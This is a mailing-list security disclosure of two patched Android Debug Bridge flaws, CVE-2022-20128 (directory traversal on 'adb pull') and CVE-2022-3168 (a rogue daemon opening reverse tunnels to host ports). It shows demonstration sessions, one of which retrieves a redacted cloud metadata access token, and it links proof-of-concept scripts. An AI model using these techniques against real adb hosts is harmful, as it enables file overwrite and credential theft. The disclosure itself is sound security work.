oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

android debug bridge (adb) reverse connection and directory traversal

From: Imre Rad <radimre83 () gmail com>
Date: Tue, 25 Oct 2022 15:52:53 +0200
Platform Tools v33.0.3
(https://developer.android.com/studio/releases/platform-tools)
released in August addresses two security issues in Android Debug
Bridge. Both require the adb host (e.g. the PC) to connect to a
compromised adb daemon (e.g. the mobile phone). This is a security
concern for example in automated environments or malware labs that run
arbitrary android packages by design.
I found and reported these issues to Google last December.

CVE-2022-20128:
Adb was vulnerable to directory traversal attacks during adb pull
operation. Example session (victim side):

root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
cat: /etc/proof: No such file or directory

root@eedd4cb8b202:/tmp/platform-tools# ./adb connect 10.6.8.145:5111
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 10.6.8.145:5111

root@eedd4cb8b202:/tmp/platform-tools# ./adb devices
List of devices attached
10.6.8.145:5111  device

root@eedd4cb8b202:/tmp/platform-tools# ./adb pull /data/local/tmp/1 /tmp/sdfsdf
/data/local/tmp/1/: 1 file pulled, 0 skipped. 0.0 MB/s (11 bytes in 0.150s)

root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
hello world


PoC code: https://github.com/irsl/CVE-2022-20128 (also attached here)


CVE-2022-3168:
The reverse tunnel feature in Android Debug Bridge (adb) was
vulnerable as it allowed malicious adb daemons to open connections to
arbitrary host/ports and unix domain sockets on the host.

Example session; both sides running on Google Cloud virtual machines
for sake of demonstration. Attacker receives the access token of the
service account the victim VM is running as.

Victim:

$ adb connect 10.128.0.5:5556
connected to 10.128.0.5:5556

Attacker side:

$ ./adb_rogue_daemon.py

...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type:
application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer:
Metadata Server for VM\r\nConnection: Close\r\nContent-Length:
1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options:
SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted]....................................................................................................................................................................................................................................................................................................................................................................................................

PoC code: https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forwards
(also attached here)


Regards,
Imre

Attachment: adbdirtrav.py
Description:

Attachment: adb_rogue_daemon.py
Description:

Previous By Date Next
Previous By Thread Next

Current thread: